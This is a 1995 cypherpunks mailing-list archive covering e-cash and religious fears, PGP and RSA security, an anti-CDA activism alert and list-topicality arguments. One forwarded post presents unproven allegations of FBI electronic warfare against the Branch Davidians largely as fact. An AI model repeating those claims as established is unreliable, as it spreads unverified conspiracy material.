Date: Thu, 3 Aug 95 11:46:14 PDT
To: Peter Trei <trei@toad.com>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <9508021741.AA05602@toad.com>
Message-ID: <Pine.ULT.3.91.950803144027.15377B-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Peter Trei wrote:

> The relevant verses are in Revelations 13, where some of the actions
> by which The Beast can be recognized are given. Among them are:
> 
> 16 And he causeth all, both small and great, rich and poor, free and 
>    bond, to receive a mark in their right hand, or in their foreheads: 
> 17 And that no man might buy or sell, save he that had the mark, or 
>    the name of the beast, or the number of his name.
> 
> Millenialist Christians tend to regard this as a method by which 
> the faithful will be shut out of the economy, since the pious will
> refuse such a 'mark'.
> 
> E-cash is a bit of a reach from this, but some of them (eg, 
> Robertson), extend the verses to cover all forms of trackable 
> transactions. I suspect that if someone could get him to realize the 
> privacy aspects of true anonymous ecash, he'd like it.
> 
> 

I read in the New York Times that a lot of fundamentalist Christians fear 
the e-cash revolution because they believe that eventually everyone will 
be required to bear a tattooed bar code on their right hand which 
would contain all a person's information:  name, d.o.b., birthplace, 
etc.  Such a tattoo would also be used to deduct e-cash from a person's 
"account" when they made purchases.  It's still a bit of a stretch; 
they're using the book of Revelations to back up this theory.

kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Thu, 3 Aug 95 12:53:23 PDT
To: Jim Ray <liberty@gate.net>
Subject: Re: There's a hole in your crypto...
In-Reply-To: <199508031918.PAA16067@bb.hks.net>
Message-ID: <Pine.SOL.3.91.950803144627.17899B-100000@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 3 Aug 1995, Jim Ray wrote:

> >Doesn't the NSA certify the security of cryptosystems?
> >I wonder what they'd say about PGP?
> 
> Their consultant, Prof. Dorothy Demming(sp?), has been asked this very
> question about PGP, and she deftly avoided comment on both PGP and IDEA.
> [I believe this was on NPR, but I'm not certain.] The emergence of NSA
> from absolutely secret agency to semi-public status (writing letters,
> P.R. concerns, opening a museum, etc.) at the same time as the general 
> availability of what's considered by many [including me] to be strong, 
> free, cryptography "for the masses" is interpreted by many [including me]
> as an implicit NSA comment on the availability of strong crypto in 
> general, and on the availability of PGP in particular.

I'm afraid I don't follow. Are you saying that the NSA is assuming a more 
public role because (apparently) stong crypto is now widely available to 
the public? I don't see the connection between A and B if this is what 
you are claiming.

Unless they're gearing up for a PR campaign... I wonder how the NSA has 
been portrayed in Hollywood in the past. I've just seen them mentioned in 
one movie I can think about ("Crimson Tide"). Anyone else know of references?

"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 3 Aug 95 12:21:04 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <199508031918.PAA16067@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Andrew Spring wrote:

<snip>

>>How do I know PGP IS secure? I don't. That doesn't mean I don't use it or
>
>Doesn't the NSA certify the security of cryptosystems?
>I wonder what they'd say about PGP?

Their consultant, Prof. Dorothy Demming(sp?), has been asked this very
question about PGP, and she deftly avoided comment on both PGP and IDEA.
[I believe this was on NPR, but I'm not certain.] The emergence of NSA
from absolutely secret agency to semi-public status (writing letters,
P.R. concerns, opening a museum, etc.) at the same time as the general 
availability of what's considered by many [including me] to be strong, 
free, cryptography "for the masses" is interpreted by many [including me]
as an implicit NSA comment on the availability of strong crypto in 
general, and on the availability of PGP in particular.
JMR

<snip sig.>


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMCEc4m1lp8bpvW01AQG/xQP/YJDZekZBS2S9behLbFEVKdGcMgxagji7
r54EZa7mzQOObtGbi8ucnKZFm0ut7puxcNfJgaGcMmboEaeyo/vlOYeICDBaouLY
I5/RJQwLjiBPcSWeDTSVDbiH4dvszaKrwYo/xC5WA8pv2kbZFEdou5HpHiiof0dV
cTCvF4j90oo=
=sNKQ
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMCEg2CoZzwIn1bdtAQH2IQF/e+BP6NnoaQxHgm8bsZQpOLqW5rb4xcMa
aHrUYlP3bYDwv49HYRlz+GQMDTCm2OII
=QYNV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 3 Aug 95 12:21:20 PDT
To: "K. M. Ellis" <cypherpunks@toad.com
Subject: Re: Pat Robertson Fears E-cash?
Message-ID: <v02120d03ac46d144088a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>I read in the New York Times that a lot of fundamentalist Christians fear
>the e-cash revolution because they believe that eventually everyone will
>be required to bear a tattooed bar code on their right hand which
>would contain all a person's information:  name, d.o.b., birthplace,
>etc.  Such a tattoo would also be used to deduct e-cash from a person's
>"account" when they made purchases.  It's still a bit of a stretch;
>they're using the book of Revelations to back up this theory.


Ah, the perils of book entry. And they had the inventer of digital bearer
certificates right there to talk to.  Tsk. Tsk.

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Thu, 3 Aug 95 13:04:29 PDT
To: cypherpunks@toad.com
Subject: Did Clinton Authorize Electronic Warfare Against Davidians? (fwd)
Message-ID: <Pine.3.89.9508031601.R19826-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain


Does this belong?

____________________________|||||||||||||||||||||______________________________
		 R. Leland Lehrman@The Gate, New Haven, CT.     	    
		    http://id.wing.net/~gate/gate.html
	  God, Art, Technology and Ecology Research and Development
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>>


---------- Forwarded message ----------
Date: Thu, 3 Aug 1995 11:41:53 -0700 (PDT)
From: Steve Wingate <steve@linex.com>
To: snet <snet-l@world.std.com>
Subject: Did Clinton Authorize Electronic Warfare Against Davidians? (fwd)



               DID CLINTON AUTHORIZE ELECTRONIC WARFARE
                     AGAINST THE BRANCH DAVIDIANS?

Carol Valentine of Waco Remembrance in a release dated 7/18/95 asserts that
 the U. S. government engaged in electronic warfare against the Branch
Davidians during the siege at Waco. Actions included jamming SOS signals
being transmitted by the Davidians, jamming incoming radio and TV signals,
dismantling Mt. Carmel's ham radio tower and using sophisticated British
military hardward (perhaps manned by British military personnel) to monitor
 the Branch Davidians every action and word.

Jamming of Radio and TV Signals

President Clinton may have personally approved the radio and TV jamming
operations during the 51-day siege. Jamming of radio and TV signals is
strictly prohibited by S law and can be carried out only in extreme
situations such as war of national security emergencies. President Clinton
himself would have had to sign the order. George Zimmerlee of Marietta,
Georgia has asked Presidnet Clinton for a copy of the order bearing his
signature. The White House has refused to provide it, saying that the White
House is not covered by the Freedom of Information Act.

The FBI jammed TV and radio signals as part of its psychological warfare on
the Davidians. Signals were jammed almost completely during the day and
night to prevent the Davidians from hearing news of support from other
Americans. The only signals permitted into Mt. Carmel's airspace during the
siege were those carrying FBI news conferences in which David Koresh was
held up to scorn and the religious views of the Davidians were ridiculed.
Through listening devices, the FBI then studied the Branch Davidian
responses to the briefings:

"You could hear them yelling and screaming about (FBI agent) Ricks and
(BATF agent) Troy, yelling and screaming about (how) people were lying
about them. That came mostly from Schneider", an FBI official told the
Dallas Morning News.

The jamming equipment was supplied by the Federal Communications
Commission.

Morse Code Signals Jammed

On the night of March 14, 1993 and on the following night, Morse Code
messages were flashed by Branch Davidians switching an overhead light on
and off. The message came from the fourth floor of the Mt. Carmel Center.
The flashing lights were picked up by TV cameras, caputred on video tape
and later analyzed. Associated Press issued a report stating that it had
analyzed the transmissions and that the message was this: SOS SOS SOS FBI
BROKE NEGOTIATIONS. WANT NEGOTATIONS FROM THE PRESS.

The MorseCode transmissions were also studies by Zimmerlee, who designs and
builds prototype electronic equipment. He is an amateur radio operator, and
holds an FCC General Radiotelephone (Operator) License. "Much of what the
Branch Davidians transmitted has been lost", says Zimmerlee. Apparently the
government was alerted of the Brnach Davidian plans by listening devices
planted inside Mt. Carmel. On the night the signal began, the FBI focused
stadium lights into the room from which the signals were being transmitted.
The Morse Code signals were obscured by the much brighter stadium lights.
In addition, a tank was pulled up directly between the light and the TV
cameras. The cameras also began panning back and forth so that viewing the
signal was interrupted during crucial transmission periods.

Interfering with SOS signals violates several international laws, including
the International Telecommunications Convention of Atlantic City, 1947
(Article 44) and the UN International Covenant on Civil and Political
Rights, Part III, Article 19. The message met the International
Telecommunication Union Rules (Article 37) definition of a distress signal.

Davidians Wayne Martin or Jeff Little, now both dead, probably sent the
code, says Zimmerlee. Both were ham radio operators, knew Morse code and
had a proficiency of 20 words per minute. "they were sending cohenert, very
readable code--exquisitly good, it was very readable", says Zimmerlee.

Ham Radio Tower Dismantled

According to Zimmerlee's research, Mt. Carmel was an FCC licensed ham radio
station. QST Magazine says Branch Davidian Wayne Martin had talked about
the existence of a ham radio tower at Mt. Carmel with another amateur
operator at Waco. The tower was an inverted "V" 14 megahertz, wire dipole
antenna with which Martin claimed to have made worldwide contact.

During the siege an FBI agent told Associated Preess that the FBI intended
to knock down Mt. Carmel's ham radio station. In a letter to Rep. Newt
Gingrich on April 21, 1994 the FBI admitted that "The Branch Davidians had
the means to send and receive communications, and the FBI took steps to
deny those communications . .."FCC has also told Zimmerlee that it has a
classified document pertaining to the amateur radio station or its
operators.

Yet footage of the Mt. Carmel Center on the day of the original BATF raid
does not show a ham radio tower. "The tower was apparently pulled up even
before helicopter gunships begin firing into Mt. Carmel by a government
operative inside Mt. Carmel. My conclusion is that the raid on Mt. Carmel
was a Military Operation, not a search. Communications in this Military
Operation was a high priority target. The government has lied about the
nature and purpose of the raid. Evidence of jamming shows that there was
something extremely danagerous about permitting the Branch Davidians to
communicate with the outside world," says Zimmerlee.

Use of Foreign Military Equipment

As reported by Linda Thompson in "Waco, the Big Lie", the British
government supplied the FBI with a multi-sensor surveillance aircraft,
equipped with forward looking infra-red radar and a low light television
camera. According to an article in "The London Sunday Times" March 21,
1993, "the siege has become a focal point for the world's Special Forces
eager to see the latest equipment being applied to a real crisis. Observer
teams from the American Delta Force and British Special Air Services have
already visited Waco". The London Times also says fibre-optic cables were
inserted within the building at Mt. Carmel and were used to relay a
full-color picture of a whole room from a lens measuring no more than
one-eighth of an inch. Government agents had infiltrated Mt. Carmel before
the raid and replaced normal telephones with converted sets which double as
microphones to relay all converation inside a room, said The Times.


* Steve Wingate / CITIZEN'S INTELLIGENCE ACCESS BBS / 415.927.2435 / MindNet






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Thu, 3 Aug 95 13:09:55 PDT
To: cypherpunks@toad.com
Subject: Re: There's a hole in your crypto...
Message-ID: <9508032009.AA15757@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> Nathan Zook writes:
>  > > And is there any way to build trusted system out of small, verifiable
>  > > pieces?  Since the way they're connected could also be questioned, I
>  > > suspect that when you put enough of them together it's just as bad as
>  > > the case of a single, monolithic program.  But this isn't my area, so
>  > > I don't know.

>  > No.  This was essentially proved during the first third of this 
century.

> Well, I haven't gotten a reply from Nathan Zook on this assertion, so
> can anyone else back it up with some references? Perhaps we're
> discussing different contexts, but proving correct systems composed of
> correct components is still a subject of active research.

> nathan

I suspect that he's referring to Godels' Theorem, which shows that 
in any complete logic system it's possible to make undecidable 
statements. 

I'm not at all sure if this can be extended to computer programs. 
Even if it can, I suspect it only applies to contrived cases.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 3 Aug 95 13:14:24 PDT
To: The Gate <gate@id.wing.net>
Subject: Re: Did Clinton Authorize Electronic Warfare Against Davidians? (fwd)
In-Reply-To: <Pine.3.89.9508031601.R19826-0100000@dialin1.wing.net>
Message-ID: <199508032014.QAA13009@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



The Gate writes:
> Does this belong?
> 
>                DID CLINTON AUTHORIZE ELECTRONIC WARFARE
>                      AGAINST THE BRANCH DAVIDIANS?

No, it doesn't belong, and deliberately being a jerk by posting the
whole thing with a "does this belong at the beginning" isn't a way to
win friends and influence people.

I'm beginning to wonder if the conspiracy idiots on this list are here
from the NSA to keep any real work getting done. Are there any
cypherpunks left here, or is it all just cryptogroupies?

Some of us want to see cryptography deployed, not conspiracy theories
about Waco, Vincent Foster, or your mother.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Thu, 3 Aug 95 13:26:21 PDT
To: cypherpunks@toad.com
Subject: Re: a hole in PGP
Message-ID: <9508032026.AA16303@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Sunder writes:

> Agreed.  If PGP has a hole it in it's not in the sources, nor in the 
> executables.  Any hole would be a breaking of the RSA or IDEA cyphers by 
> the TLA's who wouldn't talk about it, or the availablity of enough super 
> fast hardware to brute force it.

> It wouldn't be that PGP, it's sources, or algorithms have holes.  It 
> would be that there is a way to factor RSA that as of yet we don't know 
> about.  And hell, that's as likely as meeting Elvis at your local 7-11. ;-)

One little mental game I sometimes play (when I'm bored with 
deciding what to do when I win the lottery :-) is:

What would you do if you could crack RSA?

Let's suppose you've stumbled upon a very fast factoring algorithm - you 
can crack all of the RSA challenges on your home PC in minutes. What 
do you do next?

Possibilities:

* Post the algorithm to the net [anonymously?].
* Post the solutions to the challenges [anonymously?].
* Apply for a patent.
* Sit on it.
* Write an article for Cryptologia, get the Draper medal.
* Try to cut a deal with RSA
* Try to cut a deal with NSA
* Try to cut a deal with KGB/Sadam/etc.
* Try to keep it a trade secret, but profit from it.

* Escrow a OTP encoded description of the algorithm, and the OTP, with 
  different (unknown to each other) lawyers, with orders to 
  post them to sci.crypt if you vanish or die mysteriously.

It's sort of fun to speculate...

Peter

PS:I'm still waiting for the SSL challenge to start.






Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ray Cromwell" <s5cromw@watson.ibm.com>
Date: Thu, 3 Aug 95 13:36:49 PDT
To: danisch@ira.uka.de (Hadmut Danisch)
Subject: Re: Object Oriented Crypto API
In-Reply-To: <9508031542.AA03277@elysion.iaks.ira.uka.de>
Message-ID: <9508032035.AA20799@play.watson.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>
> Good idea.
>
> I would have some suggestions, but first
> an important question:
>
> Is it to be discussed on the Cypherpunks list?

  I don't see why not. It's related to crypto, and it's related to
writing code. Or has the cypherpunks list degenerated into an arena
where the top subjects are the Waco hearings, paranoid government/NSA
rumors, US vs German censorhip, and irrelevent political messages?

-Ray



From owner-cypherpunks  Thu Aug  3 14:35:14 1995



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dorothy Voss <virgie2@ais.net>
Date: Thu, 3 Aug 95 14:35:14 PDT
To: cypherpunks@toad.com
Subject: ALERT: House to Vote This Week on Net-Censorship Bills (fwd)
Message-ID: <Pine.3.89.9508031605.A16583-0100000@eagle.ais.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 1 Aug 1995 17:43:34 -0400
From:editor@cdt.org
To: policy-posts@cdt.org
Subject: ALERT: House to Vote This Week on Net-Censorship Bills


HOUSE TO VOTE THIS WEEK
-----------------------

The House of Representatives will vote late Thursday or Early Friday
(Aug 3 or 4) on whether to add the Cox/Wyden Internet Freedom and Family
Empowerment Act as an amendment to the House Telecommunications Reform 
Bill (HR 1555). 

The Cox/Wyden amendment is a direct attack on the Exon/Coats Communications
Decency Act (CDA). House passage of the Cox/Wyden amendment is the last 
chance we have to defeat the Exon/Coats CDA. If the House fails to pass
Cox/Wyden, the Exon bill will likely become law.

We must act now to head off this possibility. Please take a moment to
contact your member of Congress and urge them to support the Cox/Wyden
legislation (described in the alert below). 

The attached alert is from a coalition organized by the Voters
Telecommunications Watch (VTW) which includes CDT, EFF, EPIC, and other 
online advocacy organizations.

This may be your last chance to make your voice heard on this critical 
issue, so please call before Friday August 4.

========================================================================
       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
        (SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)

        Update: -Latest News:
                        House vows to vote on Telecomm bill (which
                        includes the CDA) this week before recess!
                -What You Can Do Now

       ***   THIS IS YOUR LAST CHANCE TO MAKE A DIFFERENCE.      ***
       ***   THE HOUSE WILL VOTE ON THE COMMUNICATIONS DECENCY   ***
       ***   ACT THIS WEEK.  IF WE LOSE, IT WILL BECOME LAW.     ***

        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
                             July 30, 1995

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
                 REDISTRIBUTE ONLY UNTIL August 14, 1995
             REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS

      Distributed by the Voters Telecommunications Watch (vtw@vtw.org)
________________________________________________________________________
CONTENTS
        The Latest News
        What You Can Do Now
        What is Cox/Wyden? (HR1978)
        Chronology of the CDA
        For More Information
        List Of Participating Organizations
        List of the House of Representatives

________________________________________________________________________
THE LATEST NEWS

This week the House of Representatives will choose between
ANTI-FREE-MARKET PRO-CENSORSHIP LEGISLATION (the Exon/Coats
Communications Decency Act) and ANTI-CENSORSHIP PRO-PARENTAL-CONTROL
LEGISLATION (the Cox/Wyden Internet Freedom and Family Empowerment Act
- HR1978).

THIS IS YOUR LAST CHANCE AS A CITIZEN TO MAKE A DIFFERENCE.  IF WE LOSE
THIS VOTE, THE COMMUNICATIONS DECENCY ACT, ALREADY PASSED BY THE SENATE,
WILL BECOME US LAW.

The vision of a cyberspace ONLY FIT FOR CHILDREN will become reality.

The Communications Decency Act will be offered by supporters of
conservative pro-censorship groups THIS WEEK.  They will try and amend
HR1555 to include the Communications Decency Act and remove any other
net-friendly language such as the Leahy/Klink study.

________________________________________________________________________
WHAT YOU CAN DO NOW

1. THERE'S NO TIME FOR EMAIL OR SNAIL MAIL.  CALL OR FAX YOUR
   REPRESENTATIVE NOW.

2. Find your rep (instructions below) and urge them to oppose the
   Communications Decency Act and support parental control legislation
   (the Cox/Wyden "Internet Freedom and Family Empowerment Act" HR1978)

   Figure out who your Rep is; feel free to use the following sample.
   
** See Instructions Below On How To Obtain Your Rep's Phone and Fax Number **

   SAMPLE PHONE CALL
    (Y=You, S=Rep's Staffer)    
        <ring ring>
        S:Rep. Snark's office, may I help you?

        Y:Hi, As your constituent I'd like to urge Rep Snark to
          oppose Internet censorship legislation such as the Exon/Coats
          Communications Decency Act and support parental control bills
          such as the Cox/Wyden Internet Freedom and Family Empowerment
          Act - HR1978.

        S:Anything else?
        Y:Yes, where does Rep. Snark stand on this issue?
        S:Rep. Snark supports HR1978.
        Y:Thank you!

   Take the response you get and mail it to vtw@vtw.org.  We'll be
   totalling up the responses and counting votes.  Send it to us
   with the subject line of "house call".

        $ Mail vtw@vtw.org
        Subject: house call
        I live in Ohio and I called Rep Snark.  Snark's staffer
        said he favors HR1978 too!
        .
        Mail sent...
        $

   SAMPLE FAX 
        Dear Representative Snark,

        As your constituent I'd like to urge Rep Snark to oppose
        Internet censorship legislation such as the Exon/Coats
        Communications Decency Act and support parental control bills
        such as the Cox/Wyden Internet Freedom and Family Empowerment
        Act - HR1978.

        Sincerely,
        
        <your address>
        
3. Ask your Internet Service Provider or Sysop to put the following
   message into their "message of the day".  We also encourage you
   to forward the following short announcement to relevant mailing
   lists where a copy of this alert would be too long for the list.

        8/1/95: The Communications Decency Act (CDA) will be voted on
        by the House of Representatives this week.  IT IS CRUCIAL THAT
        YOU CALL YOUR REPRESENTATIVE NOW.  To get a copy of the alert,
        send mail to vtw@vtw.org with "send alert" in the subject line,
        gopher -p 1/vtw/exon/alert gopher.panix.com, or
        URL:gopher://gopher.panix.com:70/00/vtw/exon/alert

4. Forward a copy of this alert to your friends until the "freshness
   date" above.  THIS IS CRUCIAL.  WE NEED TO GENERATE CALLS OF SUPPORT
   OR THE COMMUNICATIONS DECENCY ACT WILL BECOME LAW.

5. Congratulate yourself!  You've done your part to save cyberspace.

________________________________________________________________________
HOW TO FIND YOUR REPRESENTATIVE'S PHONE AND FAX NUMBER:

1. If you don't remember your representative's phone number, send email to
 
     reps@cdt.org

   You will automatically receive a list of all 435 members of the House of
   Representatives with phone and fax numbers.

2. OR, call the Capitol Switchboard (+1.202.225.3121) and ask to be 
   connected to your Rep's office. If you don't remember who
   your Rep. is, the operator can tell you when provided with your zipcode.

________________________________________________________________________
WHAT IS COX/WYDEN?

Cox/Wyden (HR1978) is legislation intended to prevent the Federal
Communications Commission (FCC) from imposing content regulations on
cyberspace and encourage private sector development and deployment of
parental control technologies.

Throughout HR1978's history, civil liberties advocates from ACLU, CDT,
EPIC & PFAW have examined the bill and recommended modifications to
ensure that the bill does not negatively impact your privacy or civil
liberties.  Although several questions still remain, Representatives
Cox and Wyden are committed to addressing these concerns.  As the
legislation moves to the House/Senate conference committee, civil
liberties advocates will continue to submit changes to the
Representatives' staffers throughout the conference process where the
House bill and the Senate-approved Communications Decency Act are
reconciled.

________________________________________________________________________
CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

House vote to occur before Friday August 4, 1995.

Jun 30, '95     Cox and Wyden introduce the "Internet Freedom and Family
                Empowerment Act" (HR 1978) as an alternative to the CDA.
Jun 21, '95     Several prominent House members publicly announce their
                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
                reform bill (S 652) by a vote of 84-16.  The Leahy bill
                (S 714) is not passed.
May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
                in the House with the Leahy alternative attached to it,
                thanks to Rep. Ron Klink of (D-PA).  The Communications
                Decency Act is not attached to it.
Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
                the Exon/Gorton bill, which commissions the Dept. of
                Justice to study the problem to see if additional legislation
                (such as the CDA) is necessary.
Mar 23, '95     S314 amended and attached to the telecommunications reform
                bill by Sen. Gorton (R-WA).  Language provides some provider
                protection, but continues to infringe upon email privacy
                and free speech.
Feb 21, '95     HR1004 referred to the House Commerce and Judiciary committees
Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
Feb  1, '95     S314 referred to the Senate Commerce committee
Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________
FOR MORE INFORMATION

Web Sites
        URL:http://www.panix.com/vtw/exon/
        URL:http://epic.org/
        URL:http://www.eff.org/pub/Alerts/
        URL:http://www.cdt.org/cda.html
        URL:http://outpost.callnet.com/outpost.html

FTP Archives 
        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
        URL:ftp://ftp.eff.org/pub/Alerts/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon
        URL:gopher://gopher.eff.org/11/Alerts

Email:
        vtw@vtw.org (put "send alert" in the subject line for the latest
                alert, or "send cdafaq" for the CDA FAQ)
        cda-info@cdt.org (General CDA information)
        cda-stat@cdt.org (Current status of the CDA)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.


American Communication Association * American Council for the Arts *
Arts & Technology Society * Association of Alternative Newsweeklies *
biancaTroll productions * Californians Against Censorship Together *
Center For Democracy And Technology * Centre for Democratic
Communications * Center for Public Representation * Citizen's Voice -
New Zealand * Cloud 9 Internet *Computer Communicators Association *
Computel Network Services * Computer Professionals for Social
Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group,
Inc. * Electronic Frontier Canada * Electronic Frontier Foundation *
Electronic Frontier Foundation - Austin * Electronic Frontiers
Australia * Electronic Frontiers Houston * Electronic Frontiers New
Hampshire * Electronic Privacy Information Center * Feminists For Free
Expression * First Amendment Teach-In * Florida Coalition Against
Censorship * FranceCom, Inc. Web Advertising Services * Friendly
Anti-Censorship Taskforce for Students * Hands Off!  The Net * Human
Rights Watch * Inland Book Company * Inner Circle Technologies, Inc. *
Inst. for Global Communications * Internet On-Ramp, Inc. * Internet
Users Consortium * Joint Artists' and Music Promotions Political Action
Committee * The Libertarian Party * Marijuana Policy Project *
Metropolitan Data Networks Ltd. * MindVox * MN Grassroots Party *
National Bicycle Greenway * National Campaign for Freedom of Expression
* National Coalition Against Censorship * National Gay and Lesbian Task
Force * National Public Telecomputing Network * National Writers Union
* Oregon Coast RISC * Panix Public Access Internet * People for the
American Way * Republican Liberty Caucus * Rock Out Censorship *
Society for Electronic Access * The Thing International BBS Network *
The WELL * Voters Telecommunications Watch

(Note: All 'Electronic Frontier' organizations are independent entities,
 not EFF chapters or divisions.)
________________________________________________________________________
        End Alert
=======================================================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 3 Aug 95 16:36:05 PDT
To: cypherpunks@toad.com
Subject: Appropriate Topics?
Message-ID: <ac46a6d9010210043f4a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:35 PM 8/3/95, Ray Cromwell wrote:

>> Good idea.
>>
>> I would have some suggestions, but first
>> an important question:
>>
>> Is it to be discussed on the Cypherpunks list?
>
>  I don't see why not. It's related to crypto, and it's related to
>writing code. Or has the cypherpunks list degenerated into an arena
>where the top subjects are the Waco hearings, paranoid government/NSA
>rumors, US vs German censorhip, and irrelevent political messages?

As I see things, talking about Ray's ideas for an object-oriented crypto
library is a big part of what this list is for. (Ditto for Wei Dai's code,
for Hal's code, and so on.)

However, it's a mistake to think that the _only_ thing appropriate for the
list is talking about code (of either kind). Not that Ray said this.

It seems to me the list is pretty well-balanced between several different
kinds of topics:

* crypto -- RSA, Diffie-Hellman, entropy, randomness, denial of service
attacks, and so on.

* software -- PGP implementations, hooks to other programs, MIME, Unix,
C++, Java, TCL, etc.

* policy -- Exon, EFF, Perl t-shirts, law, export, etc. (The worst of these
are the long policy analyses forwarded to this list from other places.)

* cultural -- movies with crypto or security themes, books, comments,
humor, etc.

* speculation -- tax effects, money laundering, crypto anarchy, etc.

* rants and conspiracies -- coverups, NSA, Waco, black helicopters, Masons,
etc. (the worst of these rants are long, rambling conspiracy theories
forwarded to this list from other places...these are probably the items
that least belong here).

(Note that the two serious problems--policy statements and conspiracy rants
forwarded from other places--share a common point: they are not written for
the Cypherpunks list by Cypherpunks...they are just stuff forwarded, with
only tangential interest to the list. And they tend to be long.)

Are these themes appropriate? Some folks want to read posts on one topic,
some on others, etc.

It's a fact that highly-specialized or detailed posts about, say, crypto
libraries, will not get as many general comments--in real life or on this
list--as a reference to a current movie will get. That's the nature of
things. I could go on about why this is so, but I think you all know why.

The "Cypherpunks write code" mantra, sometimes cited by those who dislike
the discussions they see, has a broader interpretation. To wit, instead of
asking others to write the code you want to see, try writing it yourself.
And this directly relates to postings: instead of asking for a different
kind of post, one should just _write_ that kind of post!

People will talk about what they want to talk about. If they get _too_ far
off into themes only distantly related to the ostensible themes of this
list, then usually some slight peer pressure will work. Plus, if people
don't respond, the threads die.

The noise messages of the form "This is not about writing code; this does
not belong on Cypherpunks" are misguided. The list is made up of people who
have crypto and privacy concerns broader than just writing C++ code for
Sparcstations.

--Tim May





..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
